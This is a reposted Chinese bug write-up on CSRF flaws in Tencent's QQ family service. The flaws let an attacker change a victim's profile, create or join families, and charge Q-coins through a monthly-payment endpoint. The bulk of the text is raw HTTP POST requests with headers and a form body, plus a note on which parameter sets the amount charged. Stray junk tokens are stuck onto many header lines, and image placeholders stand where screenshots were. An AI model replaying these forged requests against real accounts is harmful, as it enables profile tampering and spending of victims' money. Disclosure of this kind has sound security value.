騰訊QQ家族任意支付QB+修改資料csrf

時間  2019-12-01
標籤 騰訊 家族 任意 支付 修改 資料 csrf 欄目 騰訊 简体版
原文   原文鏈接

http://jz.qq.com/m_card.shtmlhtml

wps_clip_image-10865

POST /cgi-bin/league_change_userinfo HTTP/1.1app

Host: jz.qq.comurl

Connection: keep-alive3d

Content-Length: 171code

Cache-Control: max-age=0orm

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8csrf

Origin: http://jz.qq.comxml

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36htm

Content-Type: application/x-www-form-urlencodedblog

Referer: http://jz.qq.com/inc/m_card.shtml

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

wps_clip_image-14458

mobile=13800138000&email=y0umer%40sina.com&nation=1&province=1&city=1&signature=%CE%D2%B2%BB%B8%F6%D0%D4&introduce=%D0%A3%B3%A4&security=1&isaccept=1&image.x=38&image.y=16

wps_clip_image-3473

wps_clip_image-32098

wps_clip_image-23198

還有能夠csrf劫持建立家族.. 修改家族..

隨意加入家族..

wps_clip_image-3854

聽說還能夠隨意揮霍QB..

任意支付漏洞:

POST /cgi-bin/league_month_pay HTTP/1.1

Host: jz.qq.com

Connection: keep-alive

Content-Length: 46

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Origin: http://jz.qq.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://jz.qq.com/cgi-bin/league_month_show?leagueid=716740

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

wps_clip_image-22213

Month 就至關於支付幾QB, 1是一月  1月2qb..

wps_clip_image-13375

利用說明:任意支付只是面向沒有設置QB支付驗證的號碼,而且加入了家族才能支付成功(所以比較雞肋)

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程